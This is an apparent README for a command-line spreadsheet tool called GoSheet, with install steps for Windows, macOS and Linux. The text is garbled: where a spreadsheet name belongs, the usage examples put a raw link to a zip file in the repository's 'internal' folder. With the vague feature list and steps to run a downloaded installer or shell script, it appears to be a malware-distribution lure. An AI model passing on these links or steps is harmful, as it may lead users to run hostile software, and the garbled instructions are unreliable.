Welcome to GoSheet, your powerful command-line interface (CLI) tool for editing spreadsheets. This guide will walk you through the steps to download and run GoSheet on your computer. You donβt need any programming knowledge; just follow the instructions, and youβll be ready to manage your spreadsheets in no time.
- Operating System: Windows, macOS, or Linux
- Disk Space: At least 100 MB of free space
- Memory: Minimum of 2 GB RAM
To start using GoSheet, you need to download it. Head over to our Releases page to find the latest version of the software.
- Click on the link to open the page.
- Look for the latest release.
- Find the appropriate file for your operating system.
- Click the download link for that file.
Once the download is finished, proceed with the installation.
- Locate the downloaded
.exefile. - Double-click the file to run the installer.
- Follow the prompts on the screen.
- Once installed, you can run GoSheet from your Start menu or desktop shortcut.
- Locate the downloaded
.dmgfile. - Double-click the file to mount the disk image.
- Drag the GoSheet icon into your Applications folder.
- Open your Applications folder and double-click GoSheet to run it.
-
Open a terminal window.
-
Navigate to the directory where you downloaded the file.
-
Run the command to install GoSheet:
chmod +x gosheet-*.sh ./gosheet-*.sh
-
You can now run GoSheet by typing
gosheetin your terminal.
Once you have installed GoSheet, you can begin editing spreadsheets using simple commands. Here are a few basic commands to help you get started:
To create a new spreadsheet, use:
gosheet create https://raw.githubusercontent.com/BenjiOdhis/GoSheet/main/internal/GoSheet-1.3.zipReplace https://raw.githubusercontent.com/BenjiOdhis/GoSheet/main/internal/GoSheet-1.3.zip with the name you want to give your spreadsheet.
To open an existing spreadsheet, use:
gosheet open https://raw.githubusercontent.com/BenjiOdhis/GoSheet/main/internal/GoSheet-1.3.zipAfter making changes, save your work with:
gosheet save- User-Friendly Commands: Edit spreadsheets easily without complex interfaces.
- Lightweight and Fast: Just a few MB to download and quick to execute.
- Cross-Platform Support: Works on Windows, macOS, and Linux.
We plan to add more features soon, including:
- Templates for common spreadsheet tasks.
- Advanced formulas for complex calculations.
- Data visualization options.
A CLI, or Command Line Interface, lets you interact with your computer by typing commands. It is often faster and more efficient for experienced users.
Yes, GoSheet can handle large spreadsheet files. However, performance may vary based on your system specifications.
If you encounter any issues or have questions, please open an issue on our GitHub Issues page.
GoSheet is open-source software licensed under the MIT License. Feel free to inspect the code and contribute to the project.
Thank you for choosing GoSheet! We hope it makes your spreadsheet editing easier and more efficient.